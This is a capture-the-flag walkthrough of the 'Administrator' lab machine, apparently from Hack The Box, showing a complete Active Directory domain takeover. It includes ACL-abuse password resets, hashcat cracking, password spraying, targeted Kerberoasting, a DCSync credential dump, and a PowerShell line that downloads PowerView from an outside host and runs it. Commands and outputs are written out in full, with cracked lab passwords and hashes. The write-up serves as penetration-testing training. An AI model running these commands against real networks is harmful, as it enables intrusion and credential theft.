Administrator
Administrator is a medium-difficulty Windows machine designed around a complete domain compromise scenario, where credentials for a low-privileged user are provided. To gain access to the michael account, ACLs (Access Control Lists) over privileged objects are enumerated, leading us to discover that the user olivia has GenericAll permissions over michael, allowing us to reset his password. With access as michael, it is revealed that he can force a password change on the user benjamin, whose password is reset. This grants access to FTP where a backup.psafe3 file is discovered, cracked, and reveals credentials for several users. These credentials are sprayed across the domain, revealing valid credentials for the user emily. Further enumeration shows that emily has GenericWrite permissions over the user ethan, allowing us to perform a targeted Kerberoasting attack. The recovered hash is cracked and reveals valid credentials for ethan, who is found to have DCSync rights ultimately allowing retrieval of the Administrator account hash and full domain compromise.
Enumeration
Step 1: Port scan
Part 1: List open ports
- Using nmap to find open ports
└─$ nmap 10.10.11.42 -T4 -p- -v -r | grep open
21/tcp open ftp
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
59579/tcp open unknown
59590/tcp open unknown
59595/tcp open unknown
59598/tcp open unknown
59617/tcp open unknown
61228/tcp open unknown
Observation
- FTP and other common windows server ports are open
Part 2: Script and version scan
- Performing script and version scan on open ports
└─$ nmap -sC -sV -T4 10.10.11.42 -p 21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49668,59579,59590,59595,59598,59617,61228
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-26 18:04 AEST
Nmap scan report for 10.10.11.42
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-26 08:05:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
59579/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
59590/tcp open msrpc Microsoft Windows RPC
59595/tcp open msrpc Microsoft Windows RPC
59598/tcp open msrpc Microsoft Windows RPC
59617/tcp open msrpc Microsoft Windows RPC
61228/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -3s
| smb2-time:
| date: 2025-04-26T08:06:38
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 255 IP addresses (1 host up) scanned in 143.64 seconds
Observation
- DC name is administrator.htb
- It is using kerberos (susceptible to kerberosting)
Step 2: Use Bloodhound
- Use
bloodhound-pythonto collect data - Start neo4j console and bloodhound
└─$ bloodhound-python -d administrator.htb -u olivia -p ichliebedich -ns 10.10.11.42 -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
- Setting
Oliviastarting point and findingFirst degree object control(Direct control means no hop needed — you can directly abuse permissions on that object without needing to move through other objects first. You have immediate permissions on them.)
Observation
Oliviahas GenericAll permision overMichael
Foothold
Step 3: Abuse GenericAll
- Check the help of GenericAll linux abuse
- Abuse GenericAll with
net rpc
─$ net rpc password "michael" "pass123" -U "administrator.htb"/"olivia"%"ichliebedich" -S "administrator.htb"
Alternative Step 3: Abuse GenericAll
- GenericAll can also be abused with net rpc by logging in to olivia and then running below command.
└─$ evil-winrm -i administrator.htb -u olivia -p ichliebedich
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
C:\Users\olivia\Documents*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael pass1234 /domain
The command completed successfully.
Observation
- Michael password has successfully changed
Lateral Movement
Step 4: Further Enumerate
- Select Transitive Object Control (shows you objects that Michael can control either directly or indirectly (through some chain)) in bloodhould from Michael
Observation
- Michael has ForceChangePassword right over Benjamin
Step 5: Use Powerview to reset password
- Since Michael has ForceChangePassword right over Benjamin we can use powerview.ps1 to reset password
- Using below PS commands
# 1. Import PowerView (if not already loaded)
# IEX (New-Object Net.WebClient).DownloadString('<local_server_indexing_powerview.ps1>')
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.24:8000/Recon/PowerView.ps1')
# 2. Convert your password into a secure string
# $SecPassword = ConvertTo-SecureString '<owned_user_password>' -AsPlainText -Force
$SecPassword = ConvertTo-SecureString 'pass1234' -AsPlainText -Force
# 3. Create a PSCredential object for michael
# $Cred = New-Object System.Management.Automation.PSCredential ('<dc_hostname>\<owned_user>', $SecPassword)
$Cred = New-Object System.Management.Automation.PSCredential ('administrator\michael', $SecPassword)
# 4. Prepare the new password you want to assign to benjamin
# $UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
$UserPassword = ConvertTo-SecureString 'pass1234' -AsPlainText -Force
# 5. Reset benjamin's password (this uses the GenericAll/ForceChangePassword rights)
# Set-DomainUserPassword -Identity <target_user> -AccountPassword $UserPassword -Credential $Cred
Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword -Credential $Cred
Observation
- Got no errors; this suggest benjamin's password has successfully changed.
- Note: This method will also work with GenericAll permission as it is a super-set of ForceChangePassword permission
Step 6: Access FTP share
- With new password we can access FTP share for benjamin.
└─$ ftp benjamin@10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||63999|)
125 Data connection already open; Transfer starting.
10-05-24 09:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||64003|)
125 Data connection already open; Transfer starting.
100% |********************************************************************************************************************************************| 952 3.02 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (2.99 KiB/s)
ftp> bye
221 Goodbye.
Observation
- We got
Backup.psafe3file (encrypted with password safe v3 encryption)
Step 7: Crack password using hashcat
- We can crack the password using hashcat.
- Providing -m value to 5200 (for password safe V3 encryption) and rockyou wordlist
└─$ hashcat Backup.psafe3 -m 5200 rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-QEMU Virtual CPU version 2.5+, 1402/2869 MB (512 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
ATTENTION! Potfile storage is disabled for this hash mode.
Passwords cracked during this session will NOT be stored to the potfile.
Consider using -o to save cracked passwords.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Initializing backend runtime for device #1. Please be patient...
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs
Backup.psafe3:tekieromucho
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: Backup.psafe3
Time.Started.....: Sat Apr 26 23:10:10 2025 (1 sec)
Time.Estimated...: Sat Apr 26 23:10:11 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3338 H/s (9.61ms) @ Accel:128 Loops:512 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4864/14344385 (0.03%)
Rejected.........: 0/4864 (0.00%)
Restore.Point....: 4608/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2049
Candidate.Engine.: Device Generator
Candidates.#1....: Liverpool -> denis
Started: Sat Apr 26 23:09:16 2025
Stopped: Sat Apr 26 23:10:13 2025
Observation
- Hashcat cracked the password (
tekieromucho)
Step 8: Use passwordsafe
- Install passwordsafe gui
sudo apt install passwordsafe
- Open passwordsafe, provide the file and the password (
tekieromucho)
- We see list of usernames.
- Right click and copied all usernames and passwords
Observation
- We find below list of username and passwords
alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
Step 9: Password Spray
- Username does not match to its corresponding password so using crackmapexec to perform password spray (we can also use netexec)
- Store usernames in users.txt and passwords in pass.txt and run below command
└─$ crackmapexec smb 10.10.11.42 -u users.txt -p pass.txt --continue-on-success | grep '[+]'
SMB 10.10.11.42 445 DC [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
Observation
- We pawned the user > Emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
Step 10: Capture user flag
Privilege Escalation
Step 11: Enumerate Emily
- Select newly owned user (emily) and choose Transitive Object Control (Transitive Object Control shows not just direct control, but also chained control. Even if Emily doesn't have full ownership over Ethan directly, GenericWrite still gives her powerful control.)
Observation
- Emily has GenericWrite right over Ethan
Step 12: Get Ethan's TGT
- Ethan has no SPN so we cannot access the TGT Hash but targetedKerberoast.py creates fake SPN on Ethan since Emily has GenericWrite access.
- Fetching Kerberos ticket of ethan from emily using targetedKerberoast.py
┌──(venv)─(kali㉿kali)-[~/apps/targetedKerberoast]
└─$ echo 'ethan' > ethan.txt
┌──(venv)─(kali㉿kali)-[~/apps/targetedKerberoast]
└─$ python3 targetedKerberoast.py --dc-ip 10.10.11.42 -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -U ethan.txt
[*] Starting kerberoast attacks
[*] Fetching usernames from file
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$c52e251863c9f1cb67ac768eb1dddc54$014b8e2a8f73e00177580545fe7d60a4920fead454029e6794f3104814aa0e44f59a20352f38ca131702d0dcf3ca3ecc531ca5540c9c20087096fd884619b0891f2ae2cae94a1081d4748a17e5239965b9dc74d4de82308886857582d2b8020e4a77c411f038b1a0f6f2bd962f83d88ce127cddbb72816a2f3b07962931a7b119ca073bb5ab032676fdd39d3e12c1040c2ce2e39af95c368ad420ec8d1f52c8dbb6df25d34785a552244eb7faec9ea59250a19bcef64f120ab94fb57373ed8501a7fa8a2a62adb862fa558ebf870115edf58f4b635998b5cea810e87b215d5534ced698e18e587d3ff9782078630b2e6937e3a246f91632c53cd0d378ba916b186f3d05019eed70c220ae6ee091f4e7a057061b4df12615622de9e5aa224824abe4bcd9f98f3e54cfda938e80968acab8154d2a809f5a114ecd9053a172c94885951c241ca83de2d18a95f503d28b6e6a8da9571f8a94f1ffbe5308f87cda489ee761a948a0c03aaeabc0df9acddc417ec56f0a7a04b87e6102224803bea062a862a417df4252e5f4d815553175e6fd70ddc56ded95c33772d4c3ed97bd8b237eb634fd532c95d191fe43a32f622c96907eb854fae6ed5a2cbf03895d2bca40cf4000ae310dee459bb4ca49d994e1592392c9f44350e233495655f0d314896d48d2343b4c8a2d042dff6eb109e5d545e34633ef853972a2d1cd156ebc596542d31ba150a381c547962383a73d575071ad71c243ce1c0d00851b487077a086032f74d6112b148fedad3ac71a62706f3da6d8780b15c66010c9a57a0a43278aed38340b7033f7b050192a76356a1cebde860afc8a605b72b1daab424ffff8acb65324ac5c6aaebf2437f99199cb1349001eb5bbd098f03ece6c5602a50c15637b59d8aa043c496576d0201fb57805a8db54be2c25dd48f6da2833472221d8d1b1213f57ebe7a90151a1d7b6fa081d1dfe342e3ce715f53d0548b7c82ae80c138dfbc9eec502ea91d5139f3621ea71095479c1b49e10b69c4a6c29447301a76bd05adc61a4103fd033860517a5b264ef102df216c15f69d5528c773fee2cf5c95d2251eaf1963a784d2975513ed3956db36ddc73ac9b34e60a0a7ee991c6cb5941d48664b0d4683b2705e0df294621907ede869f1f81fdc34a1e04867f2df2c44aa00c34aacaaae94c0807d433585753c73ffe6a34c2d42d5d0d977ecca3b55718465bed876d80e17886d3a1911c205238b068d449b79066768250bdf4e35ba2c2b3f96237243f849355c1b90a542e0bf98738b0acc7d99ac76b46be4da790886de1eb0ac941881e5c7ff113cd3fd318388021cf6ef165a261799117b74b8e47ecf06dc607febf6f0b63c5f08031f37ac2718dde3953737728ccef74d3401cf19589a0bd2c77a382b774710e248edab91f3ff5643e65162df6a93b86e163838543ad99a3dcb0c7c743940a3c3310ab8d2d5943410878fb881c3dd4b4ddc6ab222e7ad0582eaa62bb7f313c9b7ac92a5edf72e0ffdc359b9c06f1a32f0b1f2ce1d
Observation
- We got TGT of Ethan
Step 13: Crack TGT
- Attempting to crack the hash using hashcat
└─$ hashcat '$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$c52e251863c9f1cb67ac768eb1dddc54$014b8e2a8f73e00177580545fe7d60a4920fead454029e6794f3104814aa0e44f59a20352f38ca131702d0dcf3ca3ecc531ca5540c9c20087096fd884619b0891f2ae2cae94a1081d4748a17e5239965b9dc74d4de82308886857582d2b8020e4a77c411f038b1a0f6f2bd962f83d88ce127cddbb72816a2f3b07962931a7b119ca073bb5ab032676fdd39d3e12c1040c2ce2e39af95c368ad420ec8d1f52c8dbb6df25d34785a552244eb7faec9ea59250a19bcef64f120ab94fb57373ed8501a7fa8a2a62adb862fa558ebf870115edf58f4b635998b5cea810e87b215d5534ced698e18e587d3ff9782078630b2e6937e3a246f91632c53cd0d378ba916b186f3d05019eed70c220ae6ee091f4e7a057061b4df12615622de9e5aa224824abe4bcd9f98f3e54cfda938e80968acab8154d2a809f5a114ecd9053a172c94885951c241ca83de2d18a95f503d28b6e6a8da9571f8a94f1ffbe5308f87cda489ee761a948a0c03aaeabc0df9acddc417ec56f0a7a04b87e6102224803bea062a862a417df4252e5f4d815553175e6fd70ddc56ded95c33772d4c3ed97bd8b237eb634fd532c95d191fe43a32f622c96907eb854fae6ed5a2cbf03895d2bca40cf4000ae310dee459bb4ca49d994e1592392c9f44350e233495655f0d314896d48d2343b4c8a2d042dff6eb109e5d545e34633ef853972a2d1cd156ebc596542d31ba150a381c547962383a73d575071ad71c243ce1c0d00851b487077a086032f74d6112b148fedad3ac71a62706f3da6d8780b15c66010c9a57a0a43278aed38340b7033f7b050192a76356a1cebde860afc8a605b72b1daab424ffff8acb65324ac5c6aaebf2437f99199cb1349001eb5bbd098f03ece6c5602a50c15637b59d8aa043c496576d0201fb57805a8db54be2c25dd48f6da2833472221d8d1b1213f57ebe7a90151a1d7b6fa081d1dfe342e3ce715f53d0548b7c82ae80c138dfbc9eec502ea91d5139f3621ea71095479c1b49e10b69c4a6c29447301a76bd05adc61a4103fd033860517a5b264ef102df216c15f69d5528c773fee2cf5c95d2251eaf1963a784d2975513ed3956db36ddc73ac9b34e60a0a7ee991c6cb5941d48664b0d4683b2705e0df294621907ede869f1f81fdc34a1e04867f2df2c44aa00c34aacaaae94c0807d433585753c73ffe6a34c2d42d5d0d977ecca3b55718465bed876d80e17886d3a1911c205238b068d449b79066768250bdf4e35ba2c2b3f96237243f849355c1b90a542e0bf98738b0acc7d99ac76b46be4da790886de1eb0ac941881e5c7ff113cd3fd318388021cf6ef165a261799117b74b8e47ecf06dc607febf6f0b63c5f08031f37ac2718dde3953737728ccef74d3401cf19589a0bd2c77a382b774710e248edab91f3ff5643e65162df6a93b86e163838543ad99a3dcb0c7c743940a3c3310ab8d2d5943410878fb881c3dd4b4ddc6ab222e7ad0582eaa62bb7f313c9b7ac92a5edf72e0ffdc359b9c06f1a32f0b1f2ce1d' -m 13100 rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-QEMU Virtual CPU version 2.5+, 1402/2869 MB (512 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$c52e251863c9f1cb67ac768eb1dddc54$014b8e2a8f73e00177580545fe7d60a4920fead454029e6794f3104814aa0e44f59a20352f38ca131702d0dcf3ca3ecc531ca5540c9c20087096fd884619b0891f2ae2cae94a1081d4748a17e5239965b9dc74d4de82308886857582d2b8020e4a77c411f038b1a0f6f2bd962f83d88ce127cddbb72816a2f3b07962931a7b119ca073bb5ab032676fdd39d3e12c1040c2ce2e39af95c368ad420ec8d1f52c8dbb6df25d34785a552244eb7faec9ea59250a19bcef64f120ab94fb57373ed8501a7fa8a2a62adb862fa558ebf870115edf58f4b635998b5cea810e87b215d5534ced698e18e587d3ff9782078630b2e6937e3a246f91632c53cd0d378ba916b186f3d05019eed70c220ae6ee091f4e7a057061b4df12615622de9e5aa224824abe4bcd9f98f3e54cfda938e80968acab8154d2a809f5a114ecd9053a172c94885951c241ca83de2d18a95f503d28b6e6a8da9571f8a94f1ffbe5308f87cda489ee761a948a0c03aaeabc0df9acddc417ec56f0a7a04b87e6102224803bea062a862a417df4252e5f4d815553175e6fd70ddc56ded95c33772d4c3ed97bd8b237eb634fd532c95d191fe43a32f622c96907eb854fae6ed5a2cbf03895d2bca40cf4000ae310dee459bb4ca49d994e1592392c9f44350e233495655f0d314896d48d2343b4c8a2d042dff6eb109e5d545e34633ef853972a2d1cd156ebc596542d31ba150a381c547962383a73d575071ad71c243ce1c0d00851b487077a086032f74d6112b148fedad3ac71a62706f3da6d8780b15c66010c9a57a0a43278aed38340b7033f7b050192a76356a1cebde860afc8a605b72b1daab424ffff8acb65324ac5c6aaebf2437f99199cb1349001eb5bbd098f03ece6c5602a50c15637b59d8aa043c496576d0201fb57805a8db54be2c25dd48f6da2833472221d8d1b1213f57ebe7a90151a1d7b6fa081d1dfe342e3ce715f53d0548b7c82ae80c138dfbc9eec502ea91d5139f3621ea71095479c1b49e10b69c4a6c29447301a76bd05adc61a4103fd033860517a5b264ef102df216c15f69d5528c773fee2cf5c95d2251eaf1963a784d2975513ed3956db36ddc73ac9b34e60a0a7ee991c6cb5941d48664b0d4683b2705e0df294621907ede869f1f81fdc34a1e04867f2df2c44aa00c34aacaaae94c0807d433585753c73ffe6a34c2d42d5d0d977ecca3b55718465bed876d80e17886d3a1911c205238b068d449b79066768250bdf4e35ba2c2b3f96237243f849355c1b90a542e0bf98738b0acc7d99ac76b46be4da790886de1eb0ac941881e5c7ff113cd3fd318388021cf6ef165a261799117b74b8e47ecf06dc607febf6f0b63c5f08031f37ac2718dde3953737728ccef74d3401cf19589a0bd2c77a382b774710e248edab91f3ff5643e65162df6a93b86e163838543ad99a3dcb0c7c743940a3c3310ab8d2d5943410878fb881c3dd4b4ddc6ab222e7ad0582eaa62bb7f313c9b7ac92a5edf72e0ffdc359b9c06f1a32f0b1f2ce1d:limpbizkit
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....f2ce1d
Time.Started.....: Sun Apr 27 06:40:38 2025 (0 secs)
Time.Estimated...: Sun Apr 27 06:40:38 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 229.3 kH/s (1.38ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5120/14344385 (0.04%)
Rejected.........: 0/5120 (0.00%)
Restore.Point....: 4608/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Liverpool -> babygrl
Started: Sun Apr 27 06:40:36 2025
Stopped: Sun Apr 27 06:40:40 2025
Observation
- The password is for user
Ethanislimpbizkit
Step 14: Enumerate Ethan
- On selecting Ethan as start node and then view high value nodes we see ethan has DCSync right on Administrator.
- Because Ethan has DCSync privilege on Administrator; we can abuse this permission using secretsdumpt to act as DC and request all NTLM hashes.
└─$ impacket-secretsdump -just-dc ADMINISTRATOR.HTB/ethan@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:8864a202387fccd97844b924072e1467:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:95687598bfb05cd32eaa2831e0ae6850:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:b360c36cb6777b8cc3d88ab1aa60f0064e6ea4fc9b9a4ebacf66345118c0e959
administrator.htb\michael:aes128-cts-hmac-sha1-96:bc3c8269d1a4a82dc55563519f16de8b
administrator.htb\michael:des-cbc-md5:43c2bc231598012a
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:a0bbafbc6a28ed32269e6a2cc2a0ccb35ac3d7314633815768f0518ebae6847f
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:426ca56d39fe628d47066fc3448b645e
administrator.htb\benjamin:des-cbc-md5:b6f84a864376a4ad
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
Observation
- We got
Administrator's NTLM hash -aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e
Step 15: Capture root flag
- Use the NT hash to login to administrator and get root flag.
Step 16: CELEBRATE
